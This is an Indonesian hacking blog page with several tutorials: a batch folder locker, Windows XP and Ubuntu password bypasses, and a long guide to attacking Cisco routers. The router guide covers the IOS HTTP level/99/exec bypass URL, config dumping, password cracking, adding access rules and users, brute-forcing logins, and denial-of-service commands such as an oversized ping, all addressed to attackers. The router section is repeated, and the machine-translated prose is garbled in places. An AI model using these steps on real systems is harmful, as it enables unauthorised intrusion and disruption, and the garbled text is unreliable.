I Like coding and I want to a programmers can ussualy successfully in the world IT
Jumat, 03 Februari 2012
CARA MENGUNCI FOLDER TANPA SOFTWARE
23984 1312602937524 1304181949 30878748 3098475
Cara Mengunci Folder Tanpa Software Wah, Judul yang terasa berat euy, Cara Mengunci Folder Tanpa Software. yah, memang itulah kenyataan yang tidak bisa dipungkiri dari judul artikel kali ini. walaupun terasa berat karena agak berbobot, akhirnya saya beranikan diri untuk menulis artikel ini. Seperti yang kita tahu, cara mudah nya si untuk memberikan sebuah pasword pada interpretation yang penting kita melakukan compresed record melalui record zip ataupun rar. itu memang cara mudahnya. tapi dalam educational kali ini, kita akan bermain dalam cara mengunci printed matter tanpa software dengan dimaksudkan dalam printed matter itu ada interpretation penting yang oleh orang tidak boleh melihatnya.Oke, mungkin tidak banyak cingcong lagi, takutnya anda ini merasa bosan dengan tulisan saya ini, karena tulisan saya ini agak ngawur dan gak jelas.
Oke, langsung saja cara Mengunci printed matter tanpa Software yaitu :
1. Buatlah sebuah notepad kosong atau brand brand new content document.txt di office mana saja di mechanism atau laptop anda. Anda boleh memberi nama apa saja untuk brand brand new content request tersebut.
2. Setelah itu anda tinggal meng-copy book yang telah saya sediakan di bawah ini :
cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are we certain we wish to Lock a folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter cue to Unlock folder
set/p “pass=>”
if NOT %pass%==type your cue here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker combined successfully
goto End
:End
..
3. Setelah anda selesai meng-copy, buka kembali notepad yang telah anda buat tadi dan Paste script ini di dalamnya.
4. buka notepad tadi dan ganti kata type your cue here dengan cue untuk membuka printed matter pada nantinya dan setelah selesai simpan script-nya dan ubah ekstensi record yang telah terdapat book tersebut dari ekstensi record ***.txt menjadi ***.bat
5. Double klik pada record tersebut dan beberapa detik kemudian akan muncul sebuah printed matter yang bernama Locker .
6. Simpanlah file-file anda yang ingin anda kunci di dalam printed matter yang bernama locker tersebut. Di dalam printed matter tersebut bisa kita letakkan record apa saja yang kita inginkan dengan ekstensi record yang berbeda. Baik itu record gambar, music, video, document, dan file-file lainnya.
7. Setelah semua record yang diinginkan tersimpan. Double klik pada book di notepad yang telah anda buat menjadi ***.bat . Lalu akan muncul tulisan are we certain wish to close a folder?(Y/N). Ketik “y” dan tekan come in untuk yes dan ketik “n” lalu tekan come in untuk no. Sekedar informasi tulisan are we certain wish to close a folder? yang ada pada book awal (default) bisa kita ubah sesuai keinginan kita. Seperti : apakah saudara yakin ingin mengunci printed matter ini? dan sebagainya.
8. Jika yang anda simpan adalah record penting, usahakan record yang anda simpan ini jangan sampai didelete oleh orang lain. Anda bisa mengantisipasinya dengan mengaktifkan fasilitas hidden record dan tidak menampakkan file-file yang ter-hidden sehingga orang lain tidak bisa menghapus record anda.
Selesai.. :)
Hacking title bar internet explorer
Hari ini saya memberitahu Anda bagaimana untuk mengedit title bar internet explorer.
Untuk ini, Anda perlu membuka registri Anda.
Untuk membuka registri pergi untuk menjalankan dan ketik regedit dan tekan enter.
Sekarang browse ke nilai berikut:
[HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main]
Sekarang pada jendela pane kanan Anda dapat melihat kunci bernama sebagai judul Window, klik dua kali untuk mengedit nilai dan menempatkan teks yang Anda inginkan yang Anda ingin menampilkan di bidang nilai.
Ada cara lain untuk melakukan ini juga. hanya copy dan paste kode di bawah ini di notepad:
[HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main] "Window Title" = "www.crypto36.blogspot.com"
sekarang simpan notepad dengan nama apapun, tapi ekstensi harus. reg
Jadi misalnya jika nama notepad pr3dat0r maka saya simpan sebagai pr3dat0r.reg
Jika Anda tidak menemukan tombol ini pada jendela pane kanan, maka Anda dapat membuat juga.
Klik kanan pada pane kanan dan pilih nilai baru REG_SZ.
Kemudian pada bidang nama Judul Jenis Window dan tekan OK.
Setelah kunci telah dibuat double klik di atasnya dan menempatkan teks yang Anda inginkan di bidang nilai dan klik OK.
Kemudian tekan tombol F5.
Kadang-kadang Anda perlu me-restart mesin / komputer untuk melihat perubahan.
Aku tidak akan bertanggung jawab jika Anda mess up dengan pengaturan registri Anda. Lebih baik membuat cadangan registri Anda. ;)
HACKING (WINDOWS DAN LINUX)
Menjebol Password Windows XP
Jika anda menggunakan OS Windows terutama Windows XP, Anda perlu ada sedikit
kekhawatiran karena terdapat beberapa bug tentang masalah security password akun anda.
Misalnya saja anda telah membuat user account baru di windows XP dengan nama Kubat dan
telah Anda lindungi dengan password dengan kata lain siapapun yang mau menggunakan
Komputer anda harus tau password anda. Seperti Contoh berikut ini :
Tapi sekarang hal tersebut tidak menjadi masalah. Berikut tips trik dalam menjebolnya :
1. Tekan kombinasi tombol Ctrl + Alt + Del. Kemudian akan muncul tampilan untuk
mengisi username dan password
2. Pada kolom username isikan ‘Administrator’ (tanpa tanda petik)
3. Pada kolom password dikosongi saja.
4. Kemudian tekan tombol enter, maka Anda akan masuk atau login kedalam windows XP
tanpa menggunakan password
Mengapa bisa terjadi demikian ? Gini lho sebabnya, secara default Windows XP itu memilik 2
account yakni Administrator dan Namaanda. Biasanya yang kita password adalah account yang
kita buat saat instalasi sedangkan Administrator tidak kita password karena di bagian Control
Panel karena memang tidak ditampilkan sehingga saat kita memasukan username dengan
Administrator dan Password kita kosongi maka kita akan masuk secara otomatis..
Terus cara mencegahnya(Hack) gimana donk ? begini caranya :
1. Seharusnya saat instalasi windows XP ketika dimintai password untuk administrator
seharusnya anda mengisikannya
2. Jika sudah terlanjur install windows XP, maka bisa lewat cara yang diatas yakni login
dulu menggunakan username administrator kemudian masuk ke control panel dan
berikan password pada User Administrator.
Ini adalah sedikit bug pada windows xp karena pada saat instalasi seharusnya user harus
dipaksa atau wajib mengisi password untuk Administrator Karena jika password tidak diisi user
lain bisa seenaknya masuk dengan menggunakan user Administrator. Oke … mungkin para
temen-temen seminar sudah banyak yang tau tentang trik ini,, semoga bermanfaat.
Jebol password Linux Ubuntu
Nah Trik yang satu ini nih yang ditunggu-tunggu, masak sih Linux masih bisa dibobol, rasanya
tak mungkin deh, kan katanya Linux sangat aman dan bebas dari ancaman virus apalagi
pembobolan password. Tapi kali ini saya akan menunjukkan bagaimana anda bisa membobol
password Ubuntu anda. Berikut langkah-langkahnya :
1. Restart Ubuntu anda
2. Pada piihan bootloader pilih Recovery Mode
3. Pilih menu Root
4. lihat user ubuntu yang ingin anda bobol dengan cara ketikkan perintah ls /home
5. setelah menentukan target maka ketikkan perintah 'passwd namauser'
6. Masukkan Password yang baru
7. Masukkan Password yang baru lagi. Tekan Enter
8. Keluarlah dari mode recovery
9. Selamat anda telah berhasil mengganti password user. Silahkan anda login dengan
password tersebut.
Langkah diatas dapat anda lakukan selama recovery mode pada Ubuntu serta root nya masih belum di security.
Mungkin dari para pembaca sudah banyak yang mengetahui tentang hal ini, bagi yang belum tau semoga bermanfaat
ya.
Cara Hacking Cisco Routers
Router adalah lapisan 3 perangkat yang digunakan untuk LAN dan WAN komunikasi (Terutama digunakan untuk komunikasi WAN). Ia melakukan fungsi pada lapisan jaringan model OSI. Menggunakan alamat IP untuk mengirim dan menerima informasi pada jaringan.
Topik ini akan lebih mudah bagi para pembaca yang memiliki pengalaman pada router. Jika Anda tidak punya pengalaman pada router maka Anda mungkin menemukan topik ini aneh.
Mengapa kita ingin hack router Cisco?
Alasannya adalah bahwa cisco merupakan router microsoft. 60% dari router di dunia adalah milik Cisco.
Router adalah perangkat yang kuat dengan kecepatan tinggi, jadi jika Anda mendapatkan kontrol atas router maka Anda dapat menggunakannya untuk berbagai tujuan seperti menerapkan DoS / DDos serangan, sistem lain hacking, mengendus lalu lintas. dll
Jadi tugas pertama kami di router cisco hacking adalah untuk menemukan router cisco pada jaringan.
Mencari cisco router adalah tugas yang cukup mudah, hampir setiap ISP akan rute melalui setidaknya satu router cisco. Cara termudah untuk menemukan sebuah router cisco adalah dengan menjalankan traceroute dari dos (ketik "tracert" dan maka alamat IP komputer seseorang atau website), Untuk misalnya:
Dalam ketik cmd berikut & tekan enter:
tracert www.facebook.com
Alih-alih facebook.com Anda dapat mengetikkan alamat website atau alamat IP. Anda dapat melacak cukup banyak orang karena jejak akan menunjukkan semua sistem komputer antara komputer Anda dan komputer mereka. Salah satu sistem ini mungkin akan memiliki nama "cisco" dalam nama itu. Jika Anda menemukan satu seperti ini, menyalin itu alamat IP.
Sekarang Anda memiliki lokasi router cisco, tetapi mungkin memiliki firewall melindunginya, sehingga Anda harus melihat apakah itu diblokir oleh ping beberapa kali, jika Anda mendapatkan ping dikembalikan kepada Anda, itu tidak mungkin terhalang. Cara lain adalah mencoba untuk mengakses beberapa port router cisco, Anda dapat melakukannya hanya dengan menggunakan telnet, dan membuka koneksi ke router pada port 23. Jika meminta password, tetapi tidak ada nama pengguna, Anda berada di router, tetapi jika ia ingin username juga, Anda mungkin di firewall atau menggunakan beberapa cara lain untuk otentikasi.
Mengidentifikasi Router Cisco:
Beberapa administrator mengkonfigurasi router sedemikian rupa sehingga sulit untuk mengenalinya
Router dapat dikonfigurasi untuk melihat seperti sistem lain pada jaringan - mereka dapat menjalankan web server, daemon SSH, chargen, dan mereka bahkan dapat terlihat menjalankan X server beberapa. Untuk alasan ini, mereka dapat mungkin sering keliru sebagai sistem Unix.
Mungkin cara termudah dan paling akurat untuk mengidentifikasi host pada jaringan sebagai router adalah dengan menggunakan Nmap - scanner port yang terhormat dengan OS fingerprinting yang sangat akurat. Scan port router Cisco khas memberitahu kita tentang hal berikut:
Menarik port pada router:
7, 9, 13, 19, 23, 79, 2001, 4001, 6001, 9001,
Jika layanan login seperti telnet atau SSH dapat diakses, satu hanya dapat menggunakan klien telnet standar dan terhubung ke port yang sesuai. Sebuah router Cisco dasar dengan ip 10.0.0.1 mungkin terlihat seperti berikut:
C: \> telnet 10.0.0.1
Mencoba 10.0.0.1 ...
Terhubung ke 10.0.0.1. Escape character is'^]'.
Akses Pengguna Verifikasi
Sandi:
The "Akses Pengguna Verifikasi" garis adalah merek dagang Cisco telnet banner. Tentu saja orang tidak dapat mengandalkan spanduk sendiri, karena administrator sistem kadang-kadang mengubah mereka untuk alasan menipu. Satu dapat mengubah spanduk dengan menggunakan perintah spanduk motd dari mode CLI router Global.
Mengidentifikasi Kerentanan:
Kerentanan scanner biasanya melakukan pekerjaan yang besar dalam mengidentifikasi kerentanan diketahui, tetapi sering dapat melewatkan kesalahan konfigurasi yang signifikan. Nessus 2.0.6 misalnya, memiliki daftar sekitar 44 string masyarakat untuk brute force daemon SNMP, yang mungkin cukup untuk menangkap penggunaan string komunitas standar umum seperti publik, dan swasta, tetapi tentu saja tidak dapat memperhitungkan spesifik lokasi akun string yang mungkin digunakan.
Pemanfaatan Kerentanan dalam Cisco IOS:
Sebuah kerentanan yang mempengaruhi kebanyakan router Cisco (ketika kondisi benar) adalah Kerentanan Konfigurasi Akses Administratif Sewenang-wenang HTTP. Ini kerentanan khusus harus ditemukan oleh semua scanner kerentanan, dan sepele untuk mengeksploitasi. Hal ini sering menghasilkan kontrol administratif penuh remote router terpengaruh. Alat penyerang pilihan hanyalah sebuah web browser. Penyerang akan memasukkan alamat URL router dalam ruang dan tekan enter,
untuk misalnya: Jika 10.0.0.1 adalah alamat router maka penyerang akan memasuki berikut di URL bar:
http://10.0.0.1
sekarang penyerang akan mendapatkan kotak Dialog Login yang akan meminta username dan password untuk login. Sekarang penyerang akan mengklik tombol Cancel dan kemudian penyerang akan memasukkan kode berikut sebagai alamat dalam ruang URL:
http:///level/xx/exec/
Dimana xx adalah nomor antara 16 dan 99.
Sebagai contoh: Mari 10.0.0.1 adalah alamat router, penyerang memasuki URL berikut ke address bar:
http://10.0.0.1/level/99/exec/show/config
perintah ini akan menyajikan konfigurasi startup dari perangkat. Konfigurasi akan terlihat mirip dengan berikut:
=================================================
Saat ini konfigurasi: 1204 byte
!
versi 12,2
tidak ada layanan enkripsi password
!
hostname kripto
!
!
enable secret 5 $ 1 $ $ V3AzF/pAhvRvjIsUimrC8 Merr.
memungkinkan sandi CCNA
!
nama pengguna crypt0 7 05331F35754843001754
!
ip ssh versi 1
!
antarmuka FastEthernet0 / 0
ip address 10.0.0.1 255.0.0.0
dupleks otomatis
kecepatan otomatis
!
antarmuka FastEthernet0 / 1
tidak ada alamat ip
dupleks otomatis
kecepatan otomatis
penutupan
!
antarmuka serial1 / 0
ip address 200.100.0.1 255.255.255.252
!
antarmuka serial1 / 1
tidak ada alamat ip
penutupan
!
antarmuka serial1 / 2
tidak ada alamat ip
penutupan
!
antarmuka serial1 / 3
tidak ada alamat ip
penutupan
!
router eigrp 50
jaringan 10.0.0.0
jaringan 200.100.0.0
tidak auto-summary
!
ip tanpa kelas
ip route 20.0.0.0 255.255.255.192 serial1 / 1
ip route 200.100.0.4 255.255.255.252 serial1 / 1
ip route 30.0.0.0 255.255.192.0 serial1 / 1
ip route 200.100.0.12 255.255.255.252 serial1 / 1
ip route 200.100.0.12 255.255.255.252 serial1 / 0
ip route 30.0.0.0 255.255.192.0 serial1 / 0
ip route 200.100.0.4 255.255.255.252 serial1 / 0
ip route 20.0.0.0 255.255.255.192 serial1 / 0
ip route 40.0.0.0 255.255.255.240 serial1 / 0
ip route 50.0.0.0 255.240.0.0 serial1 / 0
ip route 200.100.0.8 255.255.255.252 serial1 / 0
!
!
spanduk motd ^ C
halo ^ C
garis con 0
line vty 0 4
sandi CCNP
login
!
!
akhir
=============================================
Sekarang kita dapat dengan mudah melihat semua konfigurasi router. Kita bisa mempelajari ini untuk hack lebih lanjut dalam router.
Cracking password:
Ada tiga metode IOS dapat digunakan untuk mewakili sandi pada file konfigurasi router. Mereka adalah:
1. Hapus Teks
2. Vigenere
3. MD5
Dalam kasus teks yang jelas Anda akan melihat sesuatu seperti ini di konfigurasi:
memungkinkan sandi passwd
Berikut passwd adalah password. Seperti dalam konfigurasi di atas Anda dapat melihat bahwa password teks yang jelas adalah CCNA.
Dalam kasus Vigenere Anda akan melihat sesuatu seperti berikut di konfigurasi:
memungkinkan sandi 7 104B0718071B17
di sini adalah password terenkripsi 104B0718071B17.
Dalam kasus MD5 Anda akan melihat sesuatu seperti berikut:
enable secret 5 $ 1 $ yOMG $ 38ZIcsEmMaIjsCyQM6hya0
Di sini $ 1 $ $ yOMG 38ZIcsEmMaIjsCyQM6hya0 adalah password terenkripsi. Sebagai contoh di konfigurasi di atas $ 1 $ $ V3AzF/pAhvRvjIsUimrC8 Merr. adalah password terenkripsi.
Sekarang Anda tahu semua tentang password sehingga memungkinkan mereka mulai retak.
Ada cara dengan mana Anda dapat dengan mudah mereset password router tapi perlu akses fisik. Jadi kita tidak akan membahas itu. Hal ini pada dasarnya dilakukan dengan menggunakan mode Rommn dari router.
Kami akan membahas cara-cara remote untuk memecahkan password.
Sekarang dalam kasus password teks yang jelas Anda tidak perlu untuk memecahkan apa-apa karena password dalam teks yang jelas sudah. lol ;-)
Dalam kasus Vigenere password tidak dienkripsi sehingga sangat dapat retak dengan mudah dengan alat yang dikenal sebagai GetPass. Dalam alat ini Anda memasukkan password terenkripsi dan akan kembali Anda password teks yang jelas.
sekarang dalam kasus MD5 itu adalah kerja yang sibuk. MD5 adalah salah satu cara hash sehingga sulit untuk retak.
Jadi kita melakukan dictionary attack atau serangan brute force pada password ini dengan menggunakan alat seperti
Cain & Abel.
Bagaimana selama mungkin tidak mungkin untuk login ke router bahkan jika Anda memiliki mandat login jika ACL dikonfigurasi di router. Mungkin ada kemungkinan bahwa ACL adalah mencegah akses kami ke router. Jadi kita dapat membuat ACL untuk memberikan kita akses ke router. Kita dapat menggunakan perintah berikut. Ketik perintah berikut sebagai URL:
http://10.0.0.1/level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR
Sekarang dalam perintah di atas adalah IP 10.0.0.1 dan 10.0.0.2 router adalah IP kita. Anda perlu mengganti 10.0.0.2 dengan alamat IP mesin Anda.
Sekarang karena kami sudah mendapat akses untuk login di router. Jadi apa yang harus dilakukan setelah Anda punya akses ke router? Sekarang kita akan membahas beberapa percobaan yang dapat anda lakukan pada perangkat yang kuat.
1. Nonaktifkan Sejarah:
Satu bisa tahu perintah apa yang telah diketik pada router CLI dengan menggunakan perintah show sejarah. Jadi kita perlu menonaktifkan sejarah. Sejarah bisa dinonaktifkan dengan menggunakan perintah berikut pada mode hak istimewa router:
sejarah terminal ukuran nol
2. Cracking Account pengguna:
Beberapa kali ada akun pengguna pada router juga. Hal ini dapat dilihat dari file konfigurasi. Sebagai contoh di file konfigurasi di atas kita melihat sebuah user bernama crypt0 dan password account-nya. Sekarang tergantung pada teknik enkripsi yang digunakan untuk mengenkripsi password kita dapat memecahkan sandi. Jika Vigenere kita dapat menggunakan alat GetPass untuk mendapatkan password teks yang jelas dan jika itu adalah MD5 kita dapat menggunakan alat seperti Kain & Mampu untuk memecahkan password dari account itu dan kemudian kita dapat mengubah password dari akun itu juga. ;-) Kami juga dapat membuat pengguna lain pada router itu.
Perintah berikut ini digunakan untuk membuat user baru. Hal ini diketik dari mode global router:
nama pengguna kata sandi kripto tes
Berikut kripto adalah username dan tes adalah password.
Dalam rangka untuk menghapus menggunakan account perintah berikut dalam mode global router:
tidak ada username kripto
Berikut kripto adalah username yang ingin Anda hapus.
3. Memaksa brute-Layanan Login:
Layanan Login brute-memaksa seperti Telnet dan SSH dapat agak sulit dan sering ribut, tetapi juga dapat menghasilkan hasil yang positif bagi penyerang. Salah satu hal pertama yang harus dilakukan sebelum melakukan jenis serangan pada router adalah untuk menentukan apakah atau tidak router menggunakan beberapa jenis otentikasi diperpanjang seperti Tacacs atau Radius. Meskipun IOS tidak memiliki sarana native mengunci pengguna setelah X jumlah usaha login, lockouts dapat diaktifkan ketika otentikasi dilewatkan ke sistem lain melalui Tacacs atau Radius. Cara termudah untuk mengetahui apakah otentikasi sedang dilewatkan ke sistem lain adalah hanya terhubung ke router menggunakan klien Telnet standar.
C: \> telnet 10.0.0.1
Mencoba 10.0.0.1 ...
Terhubung ke 10.0.0.1. Escape character is'^]'.
Akses Pengguna Verifikasi
Username:
Jika perangkat meminta username, Anda hampir dapat yakin bahwa itu adalah menggunakan beberapa bentuk otentikasi diperpanjang. Dalam hal ini, Tacacs diimplementasikan dan brute-memaksa akan menjadi lebih sulit, karena penyerang akan harus menebak dua variabel, baik username dan password bukan hanya password. Jika jari berjalan, username dapat dikumpulkan, namun kemungkinan mengunci akun pengguna yang sah mungkin akan menghentikan penyerang besar dari melakukan semacam serangan. Tentu saja, jika Anda memiliki izin untuk menilai situs melalui "apa yang diperlukan" Anda masih mungkin ingin melakukan beberapa brute-memaksa hingga ambang lockout. Jika tidak diperpanjang maka hanya otentikasi password akan ditanyakan. Jika ditentukan bahwa otorisasi diperpanjang tidak digunakan, maka penyerang dapat brute force Telnet daemon. Brutus adalah alat berbasis Windows kasar-memaksa yang melakukan sejumlah protokol yang berbeda, dan dapat disesuaikan untuk protokol baru on the fly. THC itu hydra juga yang sangat baik, berbasis Unix alat yang sangat mampu brute memaksa sejumlah layanan yang berbeda.
Lama Teknik router hack:
Router Cisco v4.1 menjalankan perangkat lunak akan mudah dinonaktifkan. Anda hanya terhubung ke router pada port 23 melalui server proxy Anda, dan masukkan string password yang BESAR, sesuatu seperti:
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Sekarang tunggu, sistem cisco mungkin reboot, dalam hal ini Anda tidak dapat hack karena sedang offline. Tapi itu mungkin akan membeku selama 2-10 menit, yang harus Anda gunakan untuk mendapatkan masuk Jika tidak terjadi, maka tidak menjalankan perangkat lunak yang rentan, dalam hal ini Anda dapat mencoba beberapa serangan DoS, seperti ping besar .
Pergi ke dos dan ketik:
ping-l 65550-t 10.0.0.1
di sini 10.0.0.1 adalah ip router, ganti dengan ip router yang sebenarnya di mana Anda melakukan serangan. Ini akan melakukan trik yang sama untuk Anda.
Sementara itu masih beku, buka koneksi lain untuk itu dari beberapa proxy lain, dan menempatkan password sebagai "admin", alasan untuk ini adalah karena secara default, ini adalah password router, dan sementara
itu dinonaktifkan sementara, maka akan kembali ke keadaan default.
Sekarang bahwa Anda telah login, Anda harus mendapatkan file password! Sistem menjalankan perangkat lunak yang berbeda, tetapi kebanyakan akan memiliki prompt seperti "HTL-tekstil" sesuatu atau, sekarang ketik "?" untuk daftar
perintah, Anda akan melihat daftar besar perintah, suatu tempat di sana Anda akan menemukan perintah transfer, gunakan itu untuk mendapatkan password file dari admin (yang merupakan pengguna saat ini) dan kirimkan ke alamat IP Anda sendiri pada port 23. Tapi sebelum Anda melakukan ini, menyiapkan HyperTerminal untuk menunggu panggilan dari router cisco. Sekarang setelah Anda mengirim file, HyperTerminal akan menanyakan apakah Anda ingin menerima file yang mesin ini mengirimkan Anda, katakan ya dan simpan ke disk.
Sekarang bahwa Anda telah memperoleh file password, anda harus menghancurkan sehingga Anda dapat mengakses router lagi. Untuk melakukan ini, Anda dapat menjalankan program seperti John the Ripper atau Cain & Able pada file password, dan Anda dapat memecahkannya
Topik ini akan lebih mudah bagi para pembaca yang memiliki pengalaman pada router. Jika Anda tidak punya pengalaman pada router maka Anda mungkin menemukan topik ini aneh.
Mengapa kita ingin hack router Cisco?
Alasannya adalah bahwa cisco merupakan router microsoft. 60% dari router di dunia adalah milik Cisco.
Router adalah perangkat yang kuat dengan kecepatan tinggi, jadi jika Anda mendapatkan kontrol atas router maka Anda dapat menggunakannya untuk berbagai tujuan seperti menerapkan DoS / DDos serangan, sistem lain hacking, mengendus lalu lintas. dll
Jadi tugas pertama kami di router cisco hacking adalah untuk menemukan router cisco pada jaringan.
Mencari cisco router adalah tugas yang cukup mudah, hampir setiap ISP akan rute melalui setidaknya satu router cisco. Cara termudah untuk menemukan sebuah router cisco adalah dengan menjalankan traceroute dari dos (ketik "tracert" dan maka alamat IP komputer seseorang atau website), Untuk misalnya:
Dalam ketik cmd berikut & tekan enter:
tracert www.facebook.com
Alih-alih facebook.com Anda dapat mengetikkan alamat website atau alamat IP. Anda dapat melacak cukup banyak orang karena jejak akan menunjukkan semua sistem komputer antara komputer Anda dan komputer mereka. Salah satu sistem ini mungkin akan memiliki nama "cisco" dalam nama itu. Jika Anda menemukan satu seperti ini, menyalin itu alamat IP.
Sekarang Anda memiliki lokasi router cisco, tetapi mungkin memiliki firewall melindunginya, sehingga Anda harus melihat apakah itu diblokir oleh ping beberapa kali, jika Anda mendapatkan ping dikembalikan kepada Anda, itu tidak mungkin terhalang. Cara lain adalah mencoba untuk mengakses beberapa port router cisco, Anda dapat melakukannya hanya dengan menggunakan telnet, dan membuka koneksi ke router pada port 23. Jika meminta password, tetapi tidak ada nama pengguna, Anda berada di router, tetapi jika ia ingin username juga, Anda mungkin di firewall atau menggunakan beberapa cara lain untuk otentikasi.
Mengidentifikasi Router Cisco:
Beberapa administrator mengkonfigurasi router sedemikian rupa sehingga sulit untuk mengenalinya
Router dapat dikonfigurasi untuk melihat seperti sistem lain pada jaringan - mereka dapat menjalankan web server, daemon SSH, chargen, dan mereka bahkan dapat terlihat menjalankan X server beberapa. Untuk alasan ini, mereka dapat mungkin sering keliru sebagai sistem Unix.
Mungkin cara termudah dan paling akurat untuk mengidentifikasi host pada jaringan sebagai router adalah dengan menggunakan Nmap - scanner port yang terhormat dengan OS fingerprinting yang sangat akurat. Scan port router Cisco khas memberitahu kita tentang hal berikut:
Menarik port pada router:
7, 9, 13, 19, 23, 79, 2001, 4001, 6001, 9001,
Jika layanan login seperti telnet atau SSH dapat diakses, satu hanya dapat menggunakan klien telnet standar dan terhubung ke port yang sesuai. Sebuah router Cisco dasar dengan ip 10.0.0.1 mungkin terlihat seperti berikut:
C: \> telnet 10.0.0.1
Mencoba 10.0.0.1 ...
Terhubung ke 10.0.0.1. Escape character is'^]'.
Akses Pengguna Verifikasi
Sandi:
The "Akses Pengguna Verifikasi" garis adalah merek dagang Cisco telnet banner. Tentu saja orang tidak dapat mengandalkan spanduk sendiri, karena administrator sistem kadang-kadang mengubah mereka untuk alasan menipu. Satu dapat mengubah spanduk dengan menggunakan perintah spanduk motd dari mode CLI router Global.
Mengidentifikasi Kerentanan:
Kerentanan scanner biasanya melakukan pekerjaan yang besar dalam mengidentifikasi kerentanan diketahui, tetapi sering dapat melewatkan kesalahan konfigurasi yang signifikan. Nessus 2.0.6 misalnya, memiliki daftar sekitar 44 string masyarakat untuk brute force daemon SNMP, yang mungkin cukup untuk menangkap penggunaan string komunitas standar umum seperti publik, dan swasta, tetapi tentu saja tidak dapat memperhitungkan spesifik lokasi akun string yang mungkin digunakan.
Pemanfaatan Kerentanan dalam Cisco IOS:
Sebuah kerentanan yang mempengaruhi kebanyakan router Cisco (ketika kondisi benar) adalah Kerentanan Konfigurasi Akses Administratif Sewenang-wenang HTTP. Ini kerentanan khusus harus ditemukan oleh semua scanner kerentanan, dan sepele untuk mengeksploitasi. Hal ini sering menghasilkan kontrol administratif penuh remote router terpengaruh. Alat penyerang pilihan hanyalah sebuah web browser. Penyerang akan memasukkan alamat URL router dalam ruang dan tekan enter,
untuk misalnya: Jika 10.0.0.1 adalah alamat router maka penyerang akan memasuki berikut di URL bar:
http://10.0.0.1
sekarang penyerang akan mendapatkan kotak Dialog Login yang akan meminta username dan password untuk login. Sekarang penyerang akan mengklik tombol Cancel dan kemudian penyerang akan memasukkan kode berikut sebagai alamat dalam ruang URL:
http:///level/xx/exec/
Dimana xx adalah nomor antara 16 dan 99.
Sebagai contoh: Mari 10.0.0.1 adalah alamat router, penyerang memasuki URL berikut ke address bar:
http://10.0.0.1/level/99/exec/show/config
perintah ini akan menyajikan konfigurasi startup dari perangkat. Konfigurasi akan terlihat mirip dengan berikut:
=================================================
Saat ini konfigurasi: 1204 byte
!
versi 12,2
tidak ada layanan enkripsi password
!
hostname kripto
!
!
enable secret 5 $ 1 $ $ V3AzF/pAhvRvjIsUimrC8 Merr.
memungkinkan sandi CCNA
!
nama pengguna crypt0 7 05331F35754843001754
!
ip ssh versi 1
!
antarmuka FastEthernet0 / 0
ip address 10.0.0.1 255.0.0.0
dupleks otomatis
kecepatan otomatis
!
antarmuka FastEthernet0 / 1
tidak ada alamat ip
dupleks otomatis
kecepatan otomatis
penutupan
!
antarmuka serial1 / 0
ip address 200.100.0.1 255.255.255.252
!
antarmuka serial1 / 1
tidak ada alamat ip
penutupan
!
antarmuka serial1 / 2
tidak ada alamat ip
penutupan
!
antarmuka serial1 / 3
tidak ada alamat ip
penutupan
!
router eigrp 50
jaringan 10.0.0.0
jaringan 200.100.0.0
tidak auto-summary
!
ip tanpa kelas
ip route 20.0.0.0 255.255.255.192 serial1 / 1
ip route 200.100.0.4 255.255.255.252 serial1 / 1
ip route 30.0.0.0 255.255.192.0 serial1 / 1
ip route 200.100.0.12 255.255.255.252 serial1 / 1
ip route 200.100.0.12 255.255.255.252 serial1 / 0
ip route 30.0.0.0 255.255.192.0 serial1 / 0
ip route 200.100.0.4 255.255.255.252 serial1 / 0
ip route 20.0.0.0 255.255.255.192 serial1 / 0
ip route 40.0.0.0 255.255.255.240 serial1 / 0
ip route 50.0.0.0 255.240.0.0 serial1 / 0
ip route 200.100.0.8 255.255.255.252 serial1 / 0
!
!
spanduk motd ^ C
halo ^ C
garis con 0
line vty 0 4
sandi CCNP
login
!
!
akhir
=============================================
Sekarang kita dapat dengan mudah melihat semua konfigurasi router. Kita bisa mempelajari ini untuk hack lebih lanjut dalam router.
Cracking password:
Ada tiga metode IOS dapat digunakan untuk mewakili sandi pada file konfigurasi router. Mereka adalah:
1. Hapus Teks
2. Vigenere
3. MD5
Dalam kasus teks yang jelas Anda akan melihat sesuatu seperti ini di konfigurasi:
memungkinkan sandi passwd
Berikut passwd adalah password. Seperti dalam konfigurasi di atas Anda dapat melihat bahwa password teks yang jelas adalah CCNA.
Dalam kasus Vigenere Anda akan melihat sesuatu seperti berikut di konfigurasi:
memungkinkan sandi 7 104B0718071B17
di sini adalah password terenkripsi 104B0718071B17.
Dalam kasus MD5 Anda akan melihat sesuatu seperti berikut:
enable secret 5 $ 1 $ yOMG $ 38ZIcsEmMaIjsCyQM6hya0
Di sini $ 1 $ $ yOMG 38ZIcsEmMaIjsCyQM6hya0 adalah password terenkripsi. Sebagai contoh di konfigurasi di atas $ 1 $ $ V3AzF/pAhvRvjIsUimrC8 Merr. adalah password terenkripsi.
Sekarang Anda tahu semua tentang password sehingga memungkinkan mereka mulai retak.
